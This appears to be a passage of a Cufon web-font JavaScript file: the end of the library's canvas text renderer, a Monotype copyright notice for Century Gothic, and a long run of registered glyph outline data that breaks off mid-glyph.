a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Typeface Â© The Monotype Corporation plc. Data Â© The Monotype Corporation plc /
 * Type Solutions Inc. 1990-91 All Rights Reserved
 * 
 * Trademark:
 * Century Gothic is a trademark of The Monotype Corporation plc.
 * 
 * Description:
 * A design based on Monotype 20th Century, which was drawn by Sol Hess between
 * 1936 and 1947. Century Gothic maintains the basic design of 20th Century but has
 * an enlarged 'x' height and has been modified to ensure satisfactory output from
 * modern digital systems. The design is influenced by the geometric style sans
 * serif faces which were popular during the 1920's and 30's. Useful for headlines
 * and general display work and for small quantities of text, particularly in
 * advertising.
 * 
 * Manufacturer:
 * Monotype Typography, Inc.
 * 
 * Designer:
 * Monotype Type Drawing Office
 * 
 * Vendor URL:
 * http://www.monotype.com/html/mtname/ms_welcome.html
 * 
 * License information:
 * http://www.monotype.com/html/type/license.html
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"20,-119v0,-23,21,-45,44,-44v23,0,44,19,44,44v0,23,-21,44,-44,44v-23,0,-44,-21,-44,-44xm95,-119v0,-16,-15,-31,-31,-31v-16,0,-31,14,-31,31v0,17,15,31,31,31v16,0,32,-14,31,-31","w":127},{"d":"28,-259r26,0r0,259r-26,0r0,-259","w":81},{"d":"226,-75v1,82,-80,76,-167,75r0,-234r-53,0r0,-25r79,0r0,111v82,-1,140,0,141,73xm199,-73v-1,-56,-51,-50,-114,-49r0,97v62,-1,115,8,114,-48","w":246},{"d":"241,0r-28,0r-86,-200r-87,200r-28,0r113,-259r5,0","w":252},{"d":"18,-259r30,0r62,101r62,-101r30,0r-77,126r82,133r-30,0r-67,-108r-68,108r-30,0r83,-133","w":219},{"d":"28,-259r26,0r0,259r-26,0r0,-259xm30,-333r39,54r-25,0r-51,-54r37,0","w":81},{"d":"69,-161v-53,-25,-34,-114,34,-109v39,3,62,23,66,60r-25,0v1,-44,-81,-47,-81,-4v0,63,113,55,113,123v0,27,-25,47,-51,52v20,13,38,31,39,59v2,75,-129,68,-136,4r26,0v7,38,84,38,84,-4v0,-61,-115,-61,-115,-128v0,-30,21,-46,46,-53xm105,-54v31,-1,59,-31,37,-58v-5,-5,-25,-21,-53,-35v-32,1,-53,36,-31,61v8,9,24,20,47,32","w":221},{"d":"187,-74v0,44,-37,75,-84,74r-71,0r0,-259v69,-3,134,0,134,64v0,26,-14,44,-33,54v32,11,54,28,54,67xm139,-195v1,-39,-40,-40,-82,-38r0,83v47,2,80,-5,82,-45xm160,-74v0,-47,-45,-52,-103,-50r0,99v55,2,103,-1,103,-49","w":206},{"d":"29,-41v36,34,87,33,87,-44r0,-174r26,0r0,175v15,96,-75,110,-127,63","w":173},{"d":"163,-92r-111,0r0,92r-25,0r0,-191r25,0r0,76r111,0r0,-76r25,0r0,191r-25,0r0,-92","w":215},{"d":"32,0r0,-259r5,0r172,198r0,-198r26,0r0,259r-6,0r-171,-195r0,195r-26,0","w":266},{"d":"27,0r0,-111r81,-92r81,92r0,111r-162,0xm41,-14r134,0r0,-91r-67,-76r-67,76r0,91","w":216},{"d":"73,41v-2,-9,-13,-8,-23,-5r5,-36r15,0r-3,21v14,-4,26,6,27,18v-1,28,-43,34,-70,23r4,-13v15,5,44,9,45,-8","w":116},{"d":"7,-191r26,0r66,147r63,-147r27,0r-114,261r-26,0r36,-84xm85,-281r39,54r-25,0r-51,-54r37,0","w":193},{"d":"15,-250v33,-42,79,15,116,-12r12,17v-34,39,-86,-20,-117,13","w":158},{"d":"197,-81v4,76,-105,120,-145,52r0,99r-25,0r0,-265v-2,-49,28,-72,71,-75v68,-5,86,95,25,112v42,3,72,34,74,77xm171,-80v-1,-47,-37,-65,-95,-62r0,-20v40,-1,60,-17,60,-48v1,-21,-15,-37,-36,-37v-72,0,-44,101,-48,166v-2,35,26,62,59,63v33,1,62,-29,60,-62","w":214},{"d":"61,-31v-85,-79,-26,-234,95,-234v30,0,57,9,82,26r26,-31r18,16r-26,31v22,22,34,53,36,94v4,104,-123,175,-212,113r-29,34r-19,-15xm221,-219v-72,-52,-174,0,-174,91v0,30,10,56,31,77xm97,-36v74,45,172,-7,169,-93v0,-29,-10,-54,-28,-74xm168,-333r38,0r-52,54r-24,0","w":312},{"d":"118,-196v36,1,59,17,76,40r0,-109r24,0r0,265r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm196,-95v0,-42,-35,-78,-76,-77v-45,1,-76,32,-76,77v0,44,32,77,76,77v44,0,76,-31,76,-77","w":246},{"d":"137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0xm96,-283v0,-20,18,-37,38,-37v20,0,37,17,37,37v0,20,-17,38,-37,38v-20,0,-39,-17,-38,-38xm153,-283v0,-9,-9,-20,-19,-19v-10,-1,-20,9,-20,19v0,10,10,19,20,19v9,0,19,-10,19,-19xm140,-382r38,0r-52,54r-24,0","w":266},{"d":"119,-173v-76,1,-68,89,-67,173r-25,0r0,-191r25,0r0,34v17,-22,38,-38,72,-39v87,-1,69,108,70,196r-24,0v-5,-70,22,-174,-51,-173xm137,39v-3,27,-38,33,-66,24r4,-13v21,12,61,-9,29,-16v-3,0,-8,0,-13,2r2,-14v18,-5,46,-2,44,17","w":219},{"d":"27,-191r25,0r0,77r88,-77r37,0r-105,91r111,100r-35,0r-96,-86r0,86r-25,0r0,-191","w":180},{"d":"27,-191r161,0r0,191r-25,0r0,-168r-111,0r0,168r-25,0r0,-191","w":215},{"d":"24,-191r25,0r0,191r-25,0r0,-191xm51,-281r-5,60r-20,0r-5,-60r30,0xm95,-243v0,8,-8,16,-16,16v-8,0,-15,-8,-15,-16v0,-8,7,-15,15,-15v8,0,16,7,16,15xm8,-243v0,8,-7,16,-15,16v-8,0,-16,-8,-16,-16v0,-8,8,-15,16,-15v8,0,15,7,15,15","w":72},{"d":"64,-225r17,0r0,207r208,0r0,18r-225,0r0,-225","w":352},{"d":"125,-173v-78,1,-67,90,-67,173r-24,0r0,-220r-28,0r0,-21r28,0r0,-24r24,0r0,24r84,0r0,21r-84,0r0,63v47,-69,159,-42,142,59r0,98r-24,0v-6,-69,24,-175,-51,-173","w":225},{"d":"52,-157v46,-69,142,-44,142,59r0,127v1,45,-27,54,-60,40r0,-22v20,11,40,3,36,-25v-8,-74,28,-195,-51,-195v-78,0,-67,90,-67,173r-25,0r0,-191r25,0r0,34","w":219},{"d":"7,-191r26,0r66,147r63,-147r27,0r-114,261r-26,0r36,-84xm85,-271r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":193},{"d":"28,-259r26,0r0,259r-26,0r0,-259xm-16,-298v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm56,-298v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":81},{"d":"6,-191r29,0r51,71r50,-71r30,0r-65,91r73,100r-30,0r-58,-80r-58,80r-29,0r72,-100","w":172},{"d":"19,-96v-3,-88,125,-140,175,-60r0,-109r24,0r0,265r-24,0r0,-33v-21,25,-47,38,-77,38v-55,1,-96,-48,-98,-101xm196,-95v0,-44,-35,-77,-76,-77v-43,0,-75,36,-76,77v-1,41,36,77,76,77v41,0,76,-33,76,-77xm246,-183r-12,-7v6,-12,10,-23,11,-34r-13,0r0,-41r27,0v1,35,0,58,-13,82","w":246},{"d":"31,-259r27,0r0,97r103,-97r35,0r-124,116r134,143r-35,0r-113,-121r0,121r-27,0r0,-259","w":212},{"d":"209,5v-27,0,-50,-17,-55,-40v-5,23,-27,39,-54,40v-85,4,-106,-118,-52,-168v21,-19,44,-31,75,-33r2,24v-48,2,-82,37,-82,86v0,40,19,68,55,68v40,0,46,-45,44,-91r25,0v-2,46,4,90,44,91v36,0,54,-29,54,-68v0,-49,-34,-84,-81,-86r2,-24v58,2,104,48,104,109v0,56,-30,91,-81,92xm169,-281r-5,60r-20,0r-5,-60r30,0","w":308},{"d":"195,4v-83,12,-144,-32,-161,-95r-26,0r6,-24r16,0v-1,-14,-1,-17,0,-30r-22,0r7,-25r20,0v18,-61,81,-107,162,-92r-7,24v-61,-10,-109,23,-127,68r113,0r-7,25r-112,0v-1,10,-2,19,0,30r104,0r-6,24r-93,0v16,48,69,83,133,70r0,25","w":199},{"d":"86,72v12,-2,9,-10,9,-31r0,-346r26,0r0,318v1,41,-18,75,-52,78v-25,2,-33,-33,-9,-36v13,-1,17,15,26,17","w":216},{"d":"7,-191r26,0r66,147r63,-147r27,0r-114,261r-26,0r36,-84xm108,-281r38,0r-52,54r-24,0","w":193},{"d":"17,-259r26,0r53,187r74,-187r5,0r74,187r53,-187r27,0r-74,259r-5,0r-77,-196r-78,196r-5,0xm161,-323r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":345},{"d":"27,-260r121,0r0,21r-121,0r0,-21","w":174},{"d":"30,-259r30,0r66,107r65,-107r30,0r-82,135r0,124r-25,0r0,-124xm13,-265r-5,60r-20,0r-5,-60r30,0","w":232},{"d":"52,-191r0,141r142,-141r0,191r-24,0r0,-140r-140,140r-3,0r0,-191r25,0","w":221},{"d":"24,-191r25,0r0,191r-25,0r0,-191xm-20,-246v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm52,-246v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":72},{"d":"32,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259","w":193},{"d":"129,5v-35,-2,-59,-16,-77,-38r0,103r-24,0r0,-335r24,0r0,109v17,-23,40,-39,76,-40v54,-1,99,47,99,100v0,53,-45,102,-98,101xm202,-95v0,-45,-31,-76,-76,-77v-41,-1,-76,35,-76,77v0,46,33,77,77,77v43,0,75,-34,75,-77","w":245},{"d":"18,-94v0,-102,146,-136,195,-58r-19,13v-40,-61,-151,-34,-151,43v0,78,109,104,151,45r19,13v-17,25,-47,43,-89,43v-57,0,-106,-43,-106,-99","w":232},{"d":"27,-265r25,0r0,151r88,-77r37,0r-105,91r111,100r-35,0r-96,-86r0,86r-25,0r0,-265xm118,39v-3,27,-38,33,-66,24r4,-13v21,12,61,-9,29,-16v-3,0,-8,0,-13,2r2,-14v18,-5,46,-2,44,17","w":180},{"d":"24,-191r25,0r0,191r-25,0r0,-191xm51,-281r-5,60r-20,0r-5,-60r30,0","w":72},{"w":99},{"d":"52,-157v46,-67,142,-45,142,59r0,168r-24,0r0,-161v1,-49,-6,-82,-51,-82v-77,0,-68,89,-67,173r-25,0r0,-191r25,0r0,34xm125,-281r-5,60r-20,0r-5,-60r30,0","w":219},{"d":"90,-137r49,0r0,25r-49,0r0,112r-26,0r0,-112r-50,0r0,-25r50,0r0,-96r-58,0r0,-26r142,0r0,26r-58,0r0,96","w":153},{"d":"145,-19v52,-6,72,-27,72,-88r0,-84r24,0r0,94v2,70,-39,98,-96,102r0,65r-25,0r0,-65v-63,-6,-96,-31,-96,-104r0,-92r24,0v2,79,-19,172,72,171r0,-171r25,0r0,172","w":264},{"d":"28,-259r26,0r0,259r-26,0r0,-259xm29,-323r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":81},{"d":"44,-54v-1,44,65,45,86,16r15,18v-35,42,-127,31,-127,-34v0,-24,12,-41,35,-51v-50,-18,-24,-92,29,-92v19,0,38,8,55,22r-14,17v-24,-22,-73,-22,-73,16v0,23,20,34,46,31r0,21v-30,-4,-51,11,-52,36","w":152},{"d":"104,-160r0,82r-81,0r0,-82r81,0","w":127},{"d":"20,-131v0,-99,109,-165,204,-120v19,10,36,23,48,40r-20,16v-20,-26,-51,-45,-93,-45v-65,0,-109,45,-112,112v-4,105,145,149,205,68r20,15v-24,30,-61,52,-113,52v-80,2,-139,-58,-139,-138xm134,-298v0,-11,9,-21,20,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-20,-9,-20,-20","w":292},{"d":"363,-73v-1,68,-58,76,-133,73r-96,-204r-97,204r-28,0r122,-259r6,0r54,111v84,0,174,-8,172,75xm336,-73v2,-63,-73,-47,-136,-49r46,97v53,1,89,-1,90,-48","w":383},{"d":"48,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259xm13,-265r-5,60r-20,0r-5,-60r30,0","w":208},{"d":"193,-190v-4,67,-55,73,-136,70r0,120r-26,0r0,-259r52,0v74,-3,102,12,110,69xm166,-190v0,-49,-56,-44,-109,-43r0,87v52,2,109,7,109,-44","w":213},{"d":"18,-259r30,0r62,101r62,-101r30,0r-77,126r82,133r-30,0r-67,-108r-68,108r-30,0r83,-133","w":219},{"d":"292,-131v0,65,-57,103,-124,106r0,25r-26,0r0,-25v-69,-3,-123,-39,-124,-106v0,-65,56,-103,124,-105r0,-23r26,0r0,23v69,3,124,39,124,105xm168,-50v53,-3,98,-25,97,-81v-1,-53,-42,-78,-97,-82r0,163xm142,-213v-53,4,-99,26,-98,82v1,53,43,78,98,81r0,-163","w":309},{"d":"108,5v-60,-2,-85,-34,-84,-104r0,-92r25,0v3,76,-19,172,59,172v43,0,63,-33,63,-77v0,-32,-15,-58,-45,-78r14,-22v82,37,74,205,-32,201xm122,-281r-5,60r-20,0r-5,-60r30,0","w":214},{"d":"116,-18v39,-2,56,-16,72,-45r21,10v-17,34,-42,57,-91,58v-58,1,-100,-47,-100,-100v0,-54,43,-101,98,-101v56,0,100,43,100,102r-172,0v-1,42,31,78,72,76xm188,-115v-6,-52,-80,-76,-120,-40v-10,9,-17,22,-22,40r142,0xm97,-246v0,-11,9,-21,20,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-20,-9,-20,-20","w":233},{"d":"266,-126v0,81,-46,126,-136,126r-93,0r0,-117r-31,0r0,-24r31,0r0,-118r65,0v110,-3,164,38,164,133xm240,-126v0,-93,-69,-114,-178,-107r0,92r68,0r0,24r-68,0r0,93v106,5,178,-8,178,-102","w":284},{"d":"99,-269r0,93r18,0r0,17r-18,0r0,30r-20,0r0,-30r-76,0xm79,-176r0,-43r-37,43r37,0","w":123},{"d":"108,-179v41,0,77,35,77,77v0,42,-36,78,-77,78v-41,0,-77,-36,-77,-78v0,-42,36,-77,77,-77xm108,-37v34,0,64,-31,64,-65v0,-34,-30,-64,-64,-64v-34,0,-64,31,-64,64v0,33,30,65,64,65","w":216},{"d":"146,109r0,-437r31,0r0,437r-31,0xm110,-328r0,201r-113,0r0,-31r82,0r0,-170r31,0xm79,-60r-82,0r0,-31r113,0r0,200r-31,0r0,-169"},{"d":"33,-174v0,-12,9,-22,21,-22v12,0,23,9,22,22v0,12,-10,21,-22,21v-12,0,-21,-9,-21,-21xm52,-47r24,11r-36,66r-18,-7","w":99},{"d":"24,-191r25,0r0,191r-25,0r0,-191xm-20,-246v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm52,-246v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":72},{"d":"119,-173v-76,1,-68,89,-67,173r-25,0r0,-191r25,0r0,34v17,-22,38,-38,72,-39v87,-1,69,108,70,196r-24,0v-5,-70,22,-174,-51,-173","w":219},{"d":"215,0r-26,0r0,-234r-132,0r0,234r-26,0r0,-259r184,0r0,259","w":245},{"d":"6,-191r126,0r0,21r-51,0r0,170r-25,0r0,-170r-50,0r0,-21","w":137},{"d":"116,-18v39,-2,56,-16,72,-45r21,10v-17,34,-42,57,-91,58v-58,1,-100,-47,-100,-100v0,-54,43,-101,98,-101v56,0,100,43,100,102r-172,0v-1,42,31,78,72,76xm188,-115v-6,-52,-80,-76,-120,-40v-10,9,-17,22,-22,40r142,0xm78,-268v12,24,66,25,78,0r23,0v-9,49,-116,49,-125,0r24,0","w":233},{"d":"18,-94v0,-102,146,-136,195,-58r-19,13v-40,-61,-151,-34,-151,43v0,78,109,104,151,45r19,13v-17,25,-47,43,-89,43v-57,0,-106,-43,-106,-99xm131,41v-2,-9,-13,-8,-23,-5r5,-36r15,0r-3,21v14,-4,26,6,27,18v-1,28,-43,34,-70,23r4,-13v15,5,44,9,45,-8","w":232},{"d":"127,-196v12,-51,-42,-67,-58,-31v-1,5,-2,17,-2,36r39,0r0,22r-39,0r0,169r-26,0r0,-169r-25,0r0,-22r25,0v-2,-51,12,-79,56,-79v41,0,55,23,55,75r0,195r-25,0r0,-196","w":174},{"d":"12,-191r140,0r-108,169r105,0r0,22r-147,0r108,-170r-98,0r0,-21xm88,-226r-24,0r-51,-45r31,0r31,27r32,-27r33,0","w":152},{"d":"31,-259r26,0r0,109r132,0r0,-109r26,0r0,259r-26,0r0,-125r-132,0r0,125r-26,0r0,-259xm112,-323r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":245},{"d":"18,-146v4,-55,72,-66,106,-24r-16,16v-21,-26,-62,-26,-68,7v7,45,84,41,84,96v0,59,-86,74,-115,29r16,-18v13,14,26,22,40,22v18,0,35,-14,35,-32v-4,-47,-86,-40,-82,-96xm59,-271r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":139},{"d":"32,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259xm86,-298v0,-11,9,-21,20,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-20,-9,-20,-20","w":193},{"d":"32,0r0,-259r5,0r172,198r0,-198r26,0r0,259r-6,0r-171,-195r0,195r-26,0","w":266},{"d":"155,-88v56,-7,79,-26,79,-92r0,-79r26,0r0,90v3,74,-39,101,-105,106r0,63r-26,0r0,-63v-67,-6,-104,-31,-104,-108r0,-88r26,0v4,60,-15,134,29,157v13,7,29,12,49,14r0,-171r26,0r0,171","w":284},{"d":"43,0r-25,0r0,-191r25,0r0,28v15,-23,40,-43,72,-27r-13,21v-75,-15,-56,95,-59,169xm74,-281r38,0r-52,54r-24,0","w":108},{"d":"18,-95v0,-54,45,-101,100,-101v54,0,99,45,99,101v0,54,-44,100,-99,100v-55,0,-100,-46,-100,-100xm192,-95v2,-40,-35,-77,-74,-77v-39,0,-77,36,-75,77v1,44,31,77,75,77v44,0,72,-33,74,-77","w":235},{"d":"49,-262r25,0r0,71r39,0r0,21r-39,0r0,170r-25,0r0,-170r-34,0r0,-21r34,0r0,-71","w":121},{"d":"25,-271r24,0r51,45r-31,0r-31,-27r-33,27r-32,0xm-11,47v19,10,35,4,35,-25r0,-213r25,0r0,220v2,45,-27,54,-60,40r0,-22","w":73},{"d":"127,-196v12,-51,-42,-67,-58,-31v-1,5,-2,17,-2,36r39,0r0,22r-39,0r0,169r-26,0r0,-169r-25,0r0,-22r25,0v-2,-51,12,-79,56,-79v41,0,55,23,55,75r0,195r-25,0r0,-196","w":174},{"d":"44,-54v-1,44,65,45,86,16r15,18v-35,42,-127,31,-127,-34v0,-24,12,-41,35,-51v-50,-18,-24,-92,29,-92v19,0,38,8,55,22r-14,17v-24,-22,-73,-22,-73,16v0,23,20,34,46,31r0,21v-30,-4,-51,11,-52,36xm91,-281r-5,60r-20,0r-5,-60r30,0","w":152},{"d":"-2,-304r184,0r0,19r-184,0r0,-19","w":180},{"d":"144,-102v44,64,-39,141,-104,96v-13,-8,-24,-22,-35,-42r22,-13v15,28,33,42,53,42v27,0,48,-17,48,-44v0,-62,-107,-74,-107,-141v0,-49,54,-76,97,-52v11,6,22,17,34,33r-21,16v-16,-20,-22,-29,-48,-31v-36,-3,-46,46,-19,66v13,9,74,54,80,70xm94,41v-2,-9,-13,-8,-23,-5r5,-36r15,0r-3,21v14,-4,26,6,27,18v-1,28,-43,34,-70,23r4,-13v15,5,44,9,45,-8","w":179},{"d":"144,-102v44,64,-39,141,-104,96v-13,-8,-24,-22,-35,-42r22,-13v15,28,33,42,53,42v27,0,48,-17,48,-44v0,-62,-107,-74,-107,-141v0,-49,54,-76,97,-52v11,6,22,17,34,33r-21,16v-16,-20,-22,-29,-48,-31v-36,-3,-46,46,-19,66v13,9,74,54,80,70xm78,-323r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":179},{"d":"118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77xm138,-281r-5,60r-20,0r-5,-60r30,0","w":245},{"d":"121,7v-63,0,-89,-33,-89,-109r0,-157r26,0r0,157v-5,59,16,84,61,84v93,0,49,-150,59,-241r26,0v-5,112,31,266,-83,266xm113,-333r38,0r-52,54r-24,0xm169,-333r38,0r-52,54r-24,0","w":235},{"d":"47,-259r26,0r0,109r132,0r0,-109r26,0r0,259r-26,0r0,-125r-132,0r0,125r-26,0r0,-259xm13,-265r-5,60r-20,0r-5,-60r30,0","w":261},{"d":"98,-265v82,-2,89,94,49,155r-78,117r-21,-14r70,-106v-53,20,-101,-21,-100,-72v0,-49,34,-79,80,-80xm43,-185v0,28,26,54,54,54v29,0,55,-25,55,-54v0,-29,-26,-55,-55,-55v-29,0,-54,26,-54,55","w":199},{"d":"21,-129v-1,-102,103,-162,203,-124v19,8,39,21,57,38r-20,19v-24,-24,-58,-43,-98,-43v-64,0,-111,45,-115,109v-8,122,200,156,219,31r-82,0r0,-25r111,0v1,80,-52,129,-130,131v-80,2,-144,-58,-145,-136xm172,41v-2,-9,-13,-8,-23,-5r5,-36r15,0r-3,21v14,-4,26,6,27,18v-1,28,-43,34,-70,23r4,-13v15,5,44,9,45,-8","w":313},{"d":"32,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259xm96,-323r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":193},{"d":"12,0r40,-96r-40,-95r26,0r39,95r-39,96r-26,0","w":90},{"d":"-3,109r0,-437r131,0r0,437r-131,0"},{"d":"18,-97v0,-94,127,-132,174,-61r0,-33r25,0r0,152v24,131,-159,148,-197,54r27,0v31,61,167,48,145,-51v-46,66,-174,33,-174,-61xm193,-97v0,-45,-29,-75,-73,-75v-45,0,-76,32,-78,76v-2,42,33,73,76,73v44,0,75,-30,75,-74xm102,-246v0,-11,9,-21,20,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-20,-9,-20,-20","w":242},{"d":"223,0r-192,0r0,-259r26,0r0,235r120,0r0,-235r26,0r0,235r44,0r0,63r-24,0r0,-39","w":254},{"d":"32,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259","w":193},{"d":"7,-191r26,0r66,147r63,-147r27,0r-114,261r-26,0r36,-84xm42,-246v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm114,-246v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":193},{"d":"102,-240v-37,0,-58,25,-60,62r-25,0v0,-50,38,-86,86,-87v60,-2,101,64,69,118v-21,36,-74,87,-105,122r119,0r0,25r-175,0r99,-107v29,-34,45,-39,48,-80v2,-29,-26,-54,-56,-53","w":199},{"d":"28,-259r26,0r0,259r-26,0r0,-259","w":81},{"d":"-3,109r0,-437r263,0r0,437r-263,0"},{"d":"8,-85r148,-68r-148,-68r0,-26r182,83r0,23r-182,82r0,-26xm190,-41r0,24r-182,0r0,-24r182,0","w":197},{"d":"21,-129v-1,-102,103,-162,203,-124v19,8,39,21,57,38r-20,19v-24,-24,-58,-43,-98,-43v-64,0,-111,45,-115,109v-8,122,200,156,219,31r-82,0r0,-25r111,0v1,80,-52,129,-130,131v-80,2,-144,-58,-145,-136xm140,-298v0,-11,9,-21,20,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-20,-9,-20,-20","w":313},{"d":"209,5v-27,0,-50,-17,-55,-40v-5,23,-27,39,-54,40v-85,4,-106,-118,-52,-168v21,-19,44,-31,75,-33r2,24v-48,2,-82,37,-82,86v0,40,19,68,55,68v40,0,46,-45,44,-91r25,0v-2,46,4,90,44,91v36,0,54,-29,54,-68v0,-49,-34,-84,-81,-86r2,-24v58,2,104,48,104,109v0,56,-30,91,-81,92","w":308},{"d":"117,-196v37,1,60,17,77,40r0,-35r24,0r0,261r-24,0r0,-103v-18,23,-42,36,-77,38v-53,1,-98,-47,-98,-101v0,-53,45,-101,98,-100xm195,-95v1,-42,-35,-78,-76,-77v-45,1,-76,33,-76,77v0,42,32,77,76,77v44,0,75,-31,76,-77","w":245},{"d":"108,5v-60,-2,-85,-34,-84,-104r0,-92r25,0v3,76,-19,172,59,172v43,0,63,-33,63,-77v0,-32,-15,-58,-45,-78r14,-22v82,37,74,205,-32,201","w":214},{"d":"116,-18v39,-2,56,-16,72,-45r21,10v-17,34,-42,57,-91,58v-58,1,-100,-47,-100,-100v0,-54,43,-101,98,-101v56,0,100,43,100,102r-172,0v-1,42,31,78,72,76xm188,-115v-6,-52,-80,-76,-120,-40v-10,9,-17,22,-22,40r142,0xm57,-260r121,0r0,21r-121,0r0,-21","w":233},{"d":"137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0xm73,-312r121,0r0,21r-121,0r0,-21","w":266},{"d":"28,-259r26,0r0,259r-26,0r0,-259xm-20,-312r121,0r0,21r-121,0r0,-21","w":81},{"d":"2,-191r25,0r58,139r62,-139r4,0r61,139r60,-139r26,0r-83,191r-5,0r-61,-137r-61,137r-5,0xm138,-271r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":299},{"w":284},{"d":"31,-262r33,0r0,133r-19,0r0,-116r-26,0xm49,7r162,-27